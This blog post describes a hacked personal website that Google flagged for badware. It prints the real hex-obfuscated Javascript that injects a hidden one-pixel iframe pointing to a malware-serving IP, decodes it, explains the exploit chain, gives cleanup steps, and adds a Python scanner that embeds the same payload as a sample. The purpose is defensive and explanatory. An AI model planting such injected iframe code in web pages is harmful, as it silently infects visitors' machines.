Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

About a week ago, I was writing a blog post and wanted to link to a friend’s personal site. I wanted to make sure I got the link right, so I googled her name. I was surprised to discover that Google wouldn’t let me connect directly to her site – instead, under the description of her site was the warning “This site may harm your computer”.

I’d seen the “this site may harm your computer” message before. Several of my colleagues at Berkman are involved with a project and website called Stop Badware. It’s the brainchild of my friend Jonathan Zittrain, who is deeply concerned that the “generativity” of internet-connected PCs might lead to an environment so dangerous that users will switch to less-generative, single-purpose Internet devices. (Zittrain’s excellent paper on generativity is here, and I’ve written previously on generativity and Stop Badware here.) Stop Badware maintains a catalog of sites that have been reported to distribute “badware”, which they describe as “…malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads.”

Google identifies sites that they believe are spreading badware and registers them with Stop Badware. My colleagues with Stop Badware have the unenviable task of managing the Google review process – if a site is tagged as spreading badware, the site’s administrator has the option of protesting and having the site reviewed by a team that includes folks at the Berkman Center. This is a very emotional issue for site owners, as having your site de-listed by Google can have very serious consequences for your traffic, your reputation, etc.

So what was my friend’s site doing on Google’s badlist? She doesn’t distribute software of any sort. Clearly some sort of mistake had been made. I wrote a snippy letter to my friends at Berkman, cc’d it to Zittrain and titled the missive, “Not the best day for Stop Badware”.

Of course, I was the one who’d made the mistake. Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:


script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:


< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness-associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network”, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So has my friend begun working for Russian/Panamanian black hat hackers? It’s pretty unlikely – she’s just not that sort of gal. So, how’d the code get onto her otherwise innocent website?

Simply put, it was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

It’s great that Google is proactively searching for these dangerous bits of code, but it would be much, much better if they were also alerting owners of these compromised sites. When the program began, the logic – as I understand it – was that using site registration information (via whois) and alerting the contacts for a site would probably result in sites being thrown off their servers before they had a chance to appeal the decisions. That might have been a good call when most of the folks getting tagged for spreading malware were knowing distributors of the evil stuff. But in a world where lots of folks are having their sites hacked and are spreading malware unknowingly, it would be a really, really good idea to alert people who’ve been tagged by Google. In this case, both the tech and admin contacts for the site were legit, working email addresses, and my friend would have been able to remove the offending code much more quickly than by having me discover it via Google.

How widespread is this new attack? That’s not clear – Stop Badware now has over 45,000 reports on URLs which Google or other partners have identified as distributing badware – my friends within the project report that daily reports of new sites have increased 300% over the past few weeks, suggesting there may be a wave of this sort of server compromise.

If your site is identified as spreading malware by Google and you think you’re experiencing this problem, do the following:

– Use the “view source” function on your browser and look at the source of the indexed pages of your site. If you find an obscured javascript like the one posted above, then there’s a good chance you’re in the same circumstances as my friend.

– Edit your html pages to remove the offending code.

– Change your password on your hosting account, making sure you’re using a secure password.

– Alert your hosting provider so they can be sure their software is patched and the attackers weren’t exploiting a known software hole.

– Visit the StopBadware site and use the “request a review” form to have them reexamine your site and remove the block. DON’T DO THIS UNTIL YOU’VE REMOVED ANY OFFENDING CODE, or you’re wasting your time and theirs.
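The decoding step shown earlier (the hex-escaped document.write(unescape(...)) that expands to a hidden one-pixel iframe) and the first step of this checklist (view source and look for obscured Javascript) can be automated. The following Python script is an added example, not code from the original post or from Stop Badware: it decodes every document.write(unescape('...')) literal it finds (tolerating the line-wrapping seen in the quoted snippet), then flags any iframe, static or injected, that is at most 1x1 pixels or loads from another host. The sample page, the clean page, the hostname example.org and all function names are constructed for illustration; the encoded string is the one quoted above.

```python
import re
import sys
from urllib.parse import unquote, urlsplit

# document.write( unescape( '...' ) ) with any amount of whitespace, as in the quoted snippet.
WRITE_UNESCAPE_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs: double-quoted, single-quoted or bare (the injected tag uses src= http://... and name=counter).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_unescape_payloads(html):
    """Return the decoded text of every document.write(unescape('...')) call in the page."""
    payloads = []
    for m in WRITE_UNESCAPE_RE.finditer(html):
        # The post shows the literal wrapped across lines; drop that whitespace before decoding.
        compact = re.sub(r"\s+", "", m.group(2))
        payloads.append(unquote(compact))
    return payloads


def parse_attrs(attr_text):
    """Turn the inside of a tag into a lower-cased attribute dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def _px(value):
    """Numeric width/height; a missing or non-numeric size is treated as large (not hidden)."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 10**6


def find_hidden_iframes(html, own_host):
    """Flag iframes that are at most 1x1 pixels or that load from a host other than own_host.

    Both the page as served and whatever document.write(unescape(...)) would inject
    at load time are checked, so the obfuscated form is not missed.
    """
    findings = []
    sources = [("static", html)]
    sources += [("unescape", text) for text in decode_unescape_payloads(html)]
    for origin, text in sources:
        for m in IFRAME_RE.finditer(text):
            attrs = parse_attrs(m.group(1))
            src = attrs.get("src", "").strip()
            host = urlsplit(src).hostname or ""
            tiny = _px(attrs.get("width")) <= 1 and _px(attrs.get("height")) <= 1
            offsite = bool(host) and host != own_host
            if tiny or offsite:
                findings.append({"origin": origin, "src": src, "tiny": tiny, "offsite": offsite})
    return findings


# Constructed sample page carrying the injection quoted in the post (encoded string copied from it,
# wrapped the way the post shows it).
SAMPLE_HTML = """<html><head><title>A personal site</title>
<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) ); </script>
</head><body><p>Welcome.</p></body></html>"""

# Constructed clean page: a same-site iframe of normal size and nothing obfuscated.
CLEAN_HTML = '<html><body><iframe src="/widgets/map.html" width="300" height="200"></iframe></body></html>'

if __name__ == "__main__":
    # Usage: python scan.py index.html about.html ...  (no arguments scans the built-in sample)
    pages = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    for name, html in pages or [("sample", SAMPLE_HTML)]:
        for f in find_hidden_iframes(html, "example.org"):
            print(f"{name}: {f['origin']} iframe -> {f['src']} (tiny={f['tiny']}, offsite={f['offsite']})")
```

Run it over the files your web server actually serves (the indexed pages, plus any shared header or footer includes), since the injection sits at the top of the page and is easy to miss in a long source listing. A hit from the "unescape" origin is the pattern described in this post; a hit from "static" is the same iframe written in the clear.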

These sorts of attacks are also reminders for Windows users that you can inadvertently install really nasty software on your machine even if you don’t open email attachments. Please, please keep your Windows installation patched and up to date, and consider using the Firefox browser. Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.

There’s a brief interview with Jonathan Zittrain in January’s Wired magazine, where the interviewer (Lucas Graves) is skeptical about JZ’s concerns about malware forcing users off PCs and onto less generative devices. Graves notes, “Things would have to get pretty damn bad to make us abandon our PCs.” JZ mentions that they could, indeed, get really bad. Hacked webservers that install code on unsuspecting visitors’ machines and turn your PC into a zombie for spam relaying and other attacks? Maybe JZ’s more prescient than I thought…

69 thoughts on “Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center”

  1. Pingback: Lex Ferenda » Swimming with the fishies

  2. What about blogs (mine is WordPress) that get the huge long javascript code inserted, but you can’t see the code at all under admin, but in view source only?
    The script displays ads and porn ads…. this also happened on another page that is outside the blog, but connected. Had to rename the page, but the code does not show when you open it in text or dreamweaver…

  3. here. It’s great to link to Ethan Zuckerman so I’ll do it again as I did in that post: read this (still) great post. The related questions of defamation and search engine immunity are both

  5. halocollection.com home page has the same IFrame, and tries to download something from IP that belongs to LUGLINK from Russia
    this is the first line of code there

  6. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and I’ve contacted stopbadware.org 3x with no response

  9. There are so many ways to attack a website, it’s just not possible to cater for them all on a constant basis if you’re a small company, so the next best thing is to try and cover the most commonly found holes like the ones described in this article, and hope that puts off the intended attacker.

    We use an automated file system scanner called Eyefile. It’s good for detecting any kind of backdoor injection and works for any kind of website.

    It can be found here:
    http://www.website-security-tools.com/

    Hope this helps.

Comments are closed.